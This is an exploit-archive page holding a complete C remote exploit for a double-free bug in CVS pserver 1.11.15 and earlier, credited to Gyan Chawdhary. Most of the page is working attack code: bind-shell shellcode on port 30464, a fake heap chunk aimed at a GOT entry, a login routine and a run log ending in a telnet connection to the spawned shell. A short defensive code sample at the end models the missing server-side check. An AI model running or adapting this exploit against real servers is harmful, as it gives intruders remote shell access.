Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit

Date: 05 Jun 2008 00:00:00. Reported by: Root. Type: seebug. Source: www.seebug.org

Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit by Gyan Chawdhar

Code

/* Remote CVS <= 1.11.15 exploit for the error_prog_name double free vuln.
 *
 * by Gyan Chawdhary, [email protected]
 *
 * Vulnerability Description:
 *
 * The vulnerability lies in the serve_argumentx function. The Argumentx
 * command parameter is used to append data to a previously supplied
 * Argument command. These data pointers are stored in the argument_vector
 * array. serve_argumentx fails to check whether an Argument command is
 * present in the argument_vector and may append data to a pointer that
 * should not get touched at all, in our case the *error_prog_name string.
 * The function calls realloc to create space for the new string. Because
 * realloc will be called to store strlen(error_prog_name) + strlen(somedata),
 * the original chunk which just stores error_prog_name will get freed. This
 * free chunk will once again get freed after we disconnect from the CVS
 * pserver.
 *
 * Theory:
 *
 * Successful exploitation depends heavily on a specific heap layout to be
 * met. The argument_vector is initialized for holding 3 ptrs. If more space
 * is required it will call realloc. The error_prog_name string resides right
 * after the argument_vector chunk.
 *
 * |11| arg_vector |11| error_prog_name |109| some chunk
 *
 * The address of error_prog_name is stored in argument_vector[0].
 *
 * To achieve successful exploitation the following steps are performed.
 *
 * 1) Send Argumentx command with a large argument to reallocate
 * error_prog_name + large command on top of the heap. This will free the
 * original error_prog_name buffer.
 *
 * 2) Send 50 Argument calls which will require the argument_vector array to
 * be reallocated, freeing the current buffer. We keep this a high number to
 * get mem from the top itself and to make the exploit reliable. As both the
 * original arg_vector & err_prg_name buffers are free they are
 * consolidated. Also we supply our fake chunk and shellcode in this call.
 *
 * 3) Send an argument command with the size & prevsize as its arguments.
 * This will now be stored in the arg_vector & err_prg_name consolidated
 * buffer.
 *
 * 4) Once we close the connection free will be called on the error_prog_name
 * string, which will read our fake size & prev_size fields pointing to the
 * fake chunk, executing our shellcode.
 *
 * Phew !!!!
 *
 * NOTES: I've tried this exp on RH 8 with glibc 2.3.*. This exp did NOT work
 * on my slack 8.0 cause of glibc 2.2 which creates a very different heap
 * layout. Also some tweaking will be required to use this exploit remotely
 * as sometimes the overwritten GOT does not execute due to early drop in the
 * connection .. Please someone figure it out n mail me :) ..
 *
 * Now the exploit
 *
 * FOR EDUCATIONAL PURPOSE ONLY
 *
 * Greets: jp - for his cool paper on advanced malloc exploits, and the
 * heapy.so
 * jaguar@felinemenace - We at ... :P
 *
 * cya
 *
 * Gyan
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>

char shellcode[] =
"xebx18"
"AAAAAAAAAAAAAAAAAAAAAAAA"
"x31xc0" // xorl %eax,%eax
"x31xdb" // xorl %ebx,%ebx
"x31xc9" // xorl %ecx,%ecx
"x31xd2" // xorl %edx,%edx
"xb0x66" // movb $0x66,%al
"xb3x01" // movb $0x1,%bl
"x51" // pushl %ecx
"xb1x06" // movb $0x6,%cl
"x51" // pushl %ecx
"xb1x01" // movb $0x1,%cl
"x51" // pushl %ecx
"xb1x02" // movb $0x2,%cl
"x51" // pushl %ecx
"x8dx0cx24" // leal (%esp),%ecx
"xcdx80" // int $0x80

/* port is 30464 !!! */
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */
"xb3x02" // movb $0x2,%bl
"xb1x02" // movb $0x2,%cl
"x31xc9" // xorl %ecx,%ecx
"x51" // pushl %ecx
"x51" // pushl %ecx
"x51" // pushl %ecx
/* port = 0x77, change if needed */
"x80xc1x77" // addb $0x77,%cl
"x66x51" // pushl %cx
"xb1x02" // movb $0x2,%cl
"x66x51" // pushw %cx
"x8dx0cx24" // leal (%esp),%ecx
"xb2x10" // movb $0x10,%dl
"x52" // pushl %edx
"x51" // pushl %ecx
"x50" // pushl %eax
"x8dx0cx24" // leal (%esp),%ecx
"x89xc2" // movl %eax,%edx
"x31xc0" // xorl %eax,%eax
"xb0x66" // movb $0x66,%al
"xcdx80" // int $0x80

/* listen(fd, 1) */
"xb3x01" // movb $0x1,%bl
"x53" // pushl %ebx
"x52" // pushl %edx
"x8dx0cx24" // leal (%esp),%ecx
"x31xc0" // xorl %eax,%eax
"xb0x66" // movb $0x66,%al
"x80xc3x03" // addb $0x3,%bl
"xcdx80" // int $0x80

/* cli = accept(fd, 0, 0) */
"x31xc0" // xorl %eax,%eax
"x50" // pushl %eax
"x50" // pushl %eax
"x52" // pushl %edx
"x8dx0cx24" // leal (%esp),%ecx
"xb3x05" // movl $0x5,%bl
"xb0x66" // movl $0x66,%al
"xcdx80" // int $0x80

/* dup2(cli, 0) */
"x89xc3" // movl %eax,%ebx
"x31xc9" // xorl %ecx,%ecx
"x31xc0" // xorl %eax,%eax
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80

/* dup2(cli, 1) */
"x41" // inc %ecx
"x31xc0" // xorl %eax,%eax
"xb0x3f" // movl $0x3f,%al
"xcdx80" // int $0x80

/* dup2(cli, 2) */
"x41" // inc %ecx
"x31xc0" // xorl %eax,%eax
"xb0x3f" // movb $0x3f,%al
"xcdx80" // int $0x80

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */
"x31xdb" // xorl %ebx,%ebx
"x53" // pushl %ebx
"x68x6ex2fx73x68" // pushl $0x68732f6e
"x68x2fx2fx62x69" // pushl $0x69622f2f
"x89xe3" // movl %esp,%ebx
"x8dx54x24x08" // leal 0x8(%esp),%edx
"x31xc9" // xorl %ecx,%ecx
"x51" // pushl %ecx
"x53" // pushl %ebx
"x8dx0cx24" // leal (%esp),%ecx
"x31xc0" // xorl %eax,%eax
"xb0x0b" // movb $0xb,%al
"xcdx80" // int $0x80

/* exit(%ebx) */
"x31xc0" // xorl %eax,%eax
"xb0x01" // movb $0x1,%al
"xcdx80"; // int $0x80

void login(char *, char *, char *);

struct sockaddr_in s;
int sock;

void xp_connect(char *ip)
{
        char buffer[1024];
        char temp[1024];
        int tmp;

        s.sin_family = AF_INET;
        s.sin_port = htons(2401);
        s.sin_addr.s_addr = inet_addr(ip);

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        {
                printf("Cannot create socketn");
                exit(-1);
        }

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
        {
                printf("Cannot connect()n");
                exit(-1);
        }
}

void xp_write(char *data)
{

        if(write (sock, data, strlen(data)) < 0)
        {
                printf("write() failedn");
                exit(-1);
        }
}

void xp_receive()
{
        int tmp;
        char buffer[1024*2];

        if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)
        {
                printf("read() failedn");
                exit(-1);
        }
        printf("%s", buffer);
}




#define GOT_MEMCPY 0x80d2b4a
#define SHELL_ADDR 0x080cda20

char *egg(unsigned int what, unsigned int where)
{
        char *ptr, *buf;
        int i=0; //dummy = 0xfffffffc;
        int size = strlen(shellcode);

        // Will contain our fake chunk supplied with our fd & bk fields,
        // addr of shellcode & got addr - 8 of free(). We will also try to
        // stuff in our shellcode in the same buffer as I don't have enough
        // gdb patience/time to find another controllable buffer :P
        buf = (char *)malloc(1250);
        ptr = buf;

        for (;i<1248;) {

                *( (int **)ptr ) = (int *)( where - 8 );
                ptr+=4;
                *( (int **)ptr ) = (int *)( what );
                ptr+=4;

                i+=8;
        }
        buf[1250] = '';
        ptr -= size;
        strcpy(ptr, shellcode);
        ptr = buf;
        return ptr;

}

unsigned char shifts[] = {
          0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, 15,
         16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
        114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,
        111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,
         41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,
        125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,
         36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,
         58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,
        225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,
        199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,
        174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,
        207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,
        192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,
        227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,
        182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,
        243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };

char *scramble(char * str)
{
        int i;
        char * s;

        s = (char *) malloc (strlen (str) + 3);
        memset(s, '', strlen(str) + 3);
        *s = 'A';
        for (i = 1; str[i - 1]; i++)
        s = shifts[(unsigned char)(str[i - 1])];
        return (s);
}

#define LOGIN "BEGIN AUTH REQUESTn/home/cvsrootn%sn%snEND AUTH REQUESTn"
#define REQUEST "Root %sn"

void login(char *login, char *password, char *repo)
{
        char *buf, *ptr, reply[1024];
        char *rep, *rp;
        buf = (char *)malloc(1024);
        rep = (char *)malloc(512);

        ptr = buf;
        rp = rep;
        sprintf(ptr, LOGIN, login, scramble(password));
        sprintf(rp, REQUEST, repo);

        ptr = buf;

        xp_write(ptr); /* login request */
        xp_receive();
        xp_write(rp); /* root dir request */


}

char argumentx[] = "Argumentx %sn";
char argument[] = "Argument %sn";
char trash[] = "FCUK";
char str[] = "Argument x42x42x42x42x6exffxffxffx1cxfcxffxff"
        "xf0xffxffxffx41x41n";

void overflow()
{
        char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr;
        int i;
        data = (char *)malloc(111111);
        dptr = data;
        buf = (char *)malloc(111111+20);
        bufp = buf;
        arg = (char *)malloc(1500);
        aptr = arg;


        memset(dptr, 'x41', 111111);
        sprintf(bufp, argumentx, data);
        xp_write(bufp);

        eg = egg(0x80d2b4a, 0x080cda20);
        sprintf(aptr, argument, eg);

        for (i=0 ; i<50; i++)
                xp_write(aptr);

        xp_write(str);
        xp_write(trash);
}



void usage(char *name)
{
        printf("CVS <= 1.11.15 Argumentx double free() remote exploit by Gyan"
               "Chawdhary ([email protected])n"
               "Usage: %s <options>n"
               "-i <target IP address>n"
               "-l <login>n"
               "-p <password>n"
               "-r <repository path>nn", name);
}



main(int argc, char **argv)
{
        int c;
        char ip[16], user[32], pass[32], rep[512];

        ip[0] = 0;
        user[0] = 0;
        pass[0] = 0;
        rep[0] = 0;

        if (argc < 2) {
                usage(argv[0]);
                exit(0);
        }

        while ((c = getopt(argc, argv, "h::l:p:i:r:")) != -1) {

                switch(c) {

                case 'h':
                        usage(argv[0]);
                        exit(0);
                case 'i':
                        strncpy(ip, optarg, sizeof(ip));
                        break;
                case 'l':
                        strncpy(user, optarg, sizeof(user));
                        break;
                case 'p':
                        strncpy(pass, optarg, sizeof(pass));
                        break;
                case 'r':
                        strncpy(rep, optarg, sizeof(rep));
                        break;
                }
        }

        if(ip) {
                printf("Connecting to vulnerable CVS server ...");
                xp_connect(ip);
                printf("OKn");
        }

        printf("Logging in ...");
        login(user, pass, rep);
        printf("OKn");

        printf("Exploiting the CVS error_prog_name double free now ...");
        overflow();
        printf("DONEn");
        printf("If everything went well there should be a shell on port 30464n");
}





//xp_connect("127.0.0.1");
//sleep(20);
//login("gyan", "gyan");
//overflow(shellcode);

/*

[root@ill crazy]# ./free -i 127.0.0.1 -l gyan -p gyan -r /home/cvsroot
Connecting to vulnerable CVS server ...OK
Logging in ...I LOVE YOU
OK
Exploiting the CVS error_prog_name double free now ...DONE
If everything went well there should be a shell on port 30464
[root@ill crazy]# telnet 127.0.0.1 30464
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.

*/
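
The missing check named in the vulnerability description, shown from the server side as an added example (a simplified model written for this page, not CVS source code and not part of the original exploit). It assumes, as the description states, that slot 0 of the argument vector holds a pointer owned elsewhere; `struct session`, `handle_argument` and `handle_argumentx` are hypothetical names.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Simplified model (assumption, not CVS source): slot 0 of the vector holds
 * a pointer owned elsewhere, as error_prog_name is in the description. */
struct session {
    char **argv;        /* argv[0] = borrowed program name, argv[1..] = args */
    size_t argc, cap;   /* used slots (slot 0 included) and capacity */
    const char *error;  /* last protocol error, NULL if none */
};

static int session_init(struct session *s, char *prog_name)
{
    s->cap = 3;         /* the description says room for 3 pointers initially */
    s->argv = calloc(s->cap, sizeof *s->argv);
    if (!s->argv) return -1;
    s->argv[0] = prog_name;
    s->argc = 1;
    s->error = NULL;
    return 0;
}

/* "Argument <text>": store a heap copy in the next slot, growing if needed. */
static int handle_argument(struct session *s, const char *text)
{
    if (s->argc == s->cap) {
        char **grown = realloc(s->argv, 2 * s->cap * sizeof *grown);
        if (!grown) { s->error = "out of memory"; return -1; }
        s->argv = grown;
        s->cap *= 2;
    }
    char *copy = malloc(strlen(text) + 1);
    if (!copy) { s->error = "out of memory"; return -1; }
    strcpy(copy, text);
    s->argv[s->argc++] = copy;
    return 0;
}

/* "Argumentx <text>": append a newline and <text> to the latest Argument. */
static int handle_argumentx(struct session *s, const char *text)
{
    /* Guard: with only slot 0 in use, "latest argument" would be the borrowed
     * program name; realloc() on it frees memory its owner frees again. */
    if (s->argc <= 1) {
        s->error = "protocol error: Argumentx without prior Argument";
        return -1;
    }
    char *last = s->argv[s->argc - 1];
    size_t old = strlen(last);
    char *grown = realloc(last, old + 1 + strlen(text) + 1);
    if (!grown) { s->error = "out of memory"; return -1; }
    grown[old] = '\n';
    strcpy(grown + old + 1, text);
    s->argv[s->argc - 1] = grown;
    return 0;
}

static void session_free(struct session *s)
{
    for (size_t i = 1; i < s->argc; i++)   /* slot 0 belongs to its owner */
        free(s->argv[i]);
    free(s->argv);
}

int main(void)
{
    char prog[] = "cvs";                   /* constructed sample input */
    struct session s;
    if (session_init(&s, prog) != 0) return 1;
    int rc = handle_argumentx(&s, "AAAA"); /* arrives before any Argument */
    printf("rc=%d error=%s argv[0]=%s\n", rc, s.error, s.argv[0]);
    session_free(&s);
    return 0;
}
```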
                              
